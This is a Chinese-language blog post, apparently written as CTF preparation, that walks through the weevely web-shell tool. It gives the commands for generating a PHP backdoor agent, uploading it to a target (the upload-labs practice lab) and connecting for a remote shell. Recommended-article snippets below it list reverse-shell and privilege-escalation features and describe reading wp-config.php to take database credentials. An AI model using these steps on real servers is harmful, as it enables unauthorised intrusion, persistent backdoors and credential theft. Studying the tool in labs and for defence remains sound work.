weevely使用小结

最新推荐文章于 2023-10-24 15:28:07 发布
最新推荐文章于 2023-10-24 15:28:07 发布
阅读量499 收藏
点赞数
分类专栏: kali工具小结 文章标签: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/122721963
版权
Weevely

写在前面

由于比赛不确定会不会提供菜刀或者蚁剑,这里我稍微对weevely进行简单介绍一下,具体还是请看官方文档,官方文档讲的很详细(前提你英语嘚不错)

官方文档:https://github.com/epinna/weevely3/wiki/Getting-Started

一般几个步骤就如下

1、在终端输入weevely查看基本使用方法

在这里插入图片描述

2、generate一个后门代理(backdoor agent)

weevely会给你自动生成,不用自己写。我这里是默认存在/root/agent.php中

root@bogon:~# weevely generate <yourpassword> <agent.php名字可以随意>

例子

在这里插入图片描述

在这里插入图片描述

3、upload the agent把第二步生成的agent上传到目标网站的某个文件夹下

我用upload-labs第一关来做个演示看看

木马所在路径

在这里插入图片描述

4、连接agent

root@bogon:~# weevely <http:target/agent.php> <yourpassword>
weevely>

在这里插入图片描述

回车后第一行weevely并不表示你已经connected,这只是方便你设置其他选项或者打印help的,比如

weevely> set debug true
debug = true
weevely>

开始输入shell命令后表示connected,可以试一下基本命令

在这里插入图片描述

输入:和两个tab可以列出所有的modules,通过输入: <module name>run相应的module

听门外雪花飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weevely3:武器化的Web外壳
04-05
韦韦利 姓名 Weevely-武器化的Web Shell 用法 weevely generate <password> <path> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标Web服务器以获得对它的远程Shell访问。 它具有30多个模块,可协助管理任务,维护访问,提供态势感知,提升特权并传播到目标网络。 阅读“页面以安装weevely及其依赖项。 阅读“页面以生成代理并连接到它。 浏览以阅读示例和用例。 特征 Shell访问目标 以目标为中心SQL控制台 HTTP / HTTPS代理浏览目标 上传和下载文件 生成反向和直接TCP Shell 审核远程目标安全 端口扫描以目标为中心 挂载远程文件系统 以目标为中心的Brute
weevely工具使用
淡巴枯的博客
05-23 6611
weevely工具使用 目录一. 关于weevely二. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
使用过程】weevely生成、上传、连接、执行…你一定行
03-31 6559
weevely傻子都会
Weevely工具使用详解 (Linux菜刀)
weixin_45116657的博客
04-10 2713
一、下载与安装 下载地址:https://github.com/epinna/weevely3 下载之后解压,使用里面的weevely.py 在kali中国 ...
什么是webshell 常见的webshell工具有哪些
Karka_的博客
06-08 1038
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 4527
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
使用Weevely工具上传一句话木马
最新发布
weixin_66469999的博客
10-24 627
使用命令weevely generate hello /root/hello.php(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马。使用命令weevely http://172.16.1.113/hackable/uploads/hello.php hello连接weevely木马。在/root目录下生成一个shell.php文件,文件内容为<?使用:file_upload /root/hello.php backdoor.php上传本地文件到目标服务器上。
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3273
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
渗透测试获取webshell方法总结
u013930899的博客
10-06 3327
本文总结了渗透测试php网站获取webshell的几种方法
Weevely(php菜刀)工具使用简介
RickGray
08-02 2733
Weevely工具使用记录 -前言 weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。 项目地址:https://github.com/epinna/Weevely 下面就针
Linux Shell Weevely
m0_55313512的博客
02-26 877
Weevely
weevely详细使用教程
热门推荐
星落的博客
05-12 2万+
weevely简介 weevely常用命令 weevely主页面 实例演示 到此就完成了weevely的介绍,如果想了解更多的Kali工具,请关注我!
【webshell管理工具之二】weevely
redwand的博客
05-09 2494
weevely是kali下集成的一款很好用的专门针对php语言的webshell管理工具,其加密的数据传输和易于操控的特性广受渗透测试们的喜爱。
weevely基本使用
BeatRex的博客
11-22 8677
一、weevely使用 weevely的功能同之前学习过的中国菜刀,但其功能更加丰富且在linux和windows下都可以运行。kali linux环境下已集成weevely。分weevely生成shell文件、weevely连接后台、weevely信息探测、weevely文件操作、weevely审计这几块来学习。 以生成一个名为weevelyshell的shell并上传连接的案例进行学习。 首先...
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP版
yggcwhat
05-02 2097
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP版
利用weevely生成php后门木马
qq_28147861的博客
01-18 3666
Weevely工具介绍 weevely 是一款具有高隐蔽性的针对PHP 平台的Web shell。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透。下面是weevely的主要功能: (1)它有30多种可完成自动管理渗透后期任务的功能模块。这些模块能够:执行命令和浏览远程文件系统;检测常见的服务器配置问题;创造TCP shell和reverse shell;在被测主机上安装HTTP代理;利用目标主机进行端口扫描。 (2)使用HTTP Cook
2021Kali系列 -- linux菜刀(weevely3)
weixin_41489908的博客
04-19 2610
​人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。 ---- 网易云热评 简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。 一、下载地址(软件作者) https://github.com/ep..
weevely生成木马文件上传获取靶机中的flag文件
qq_55961856的博客
06-02 2233
在靶机里创建了一个flag.txt,通过生成木马文件上传获取靶机中的flag.txt 攻击机kali:192.168.182.133 靶机metasploit:192.168.182.128 ping一下看看靶机是否存活 输入weevely generate 123456 /root/muma.php生成一个密码为123456的木马文件存放在root下 cat看一下生成的木马文件 个人觉得这种绕过的强度应该够用 进入靶机dvwa,将等级调至low 然后进入靶机cat查看一下 成功上传到靶机
weevely怎么寻找网站使用的数据库的账号
05-30
在连接到 webshell 后门之后,可以使用以下命令查看数据库的配置信息: ``` cat /path/to/web/root/wp-config.php ``` 这个命令适用于 WordPress 网站,如果是其他类型的网站,则需要查找相应的配置文件。 在配置文件中,可以找到数据库的账号和密码等信息,例如: ```php define('DB_NAME', 'database_name_here'); /** MySQL database username */ define('DB_USER', 'username_here'); /** MySQL database password */ define('DB_PASSWORD', 'password_here'); /** MySQL hostname */ define('DB_HOST', 'localhost'); ``` 其中,`DB_USER` 就是数据库的账号。需要注意的是,这种方式仅适用于未加密的配置文件。如果配置文件被加密或者不可读,那么就需要使用其他的方式来获取数据库账号。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值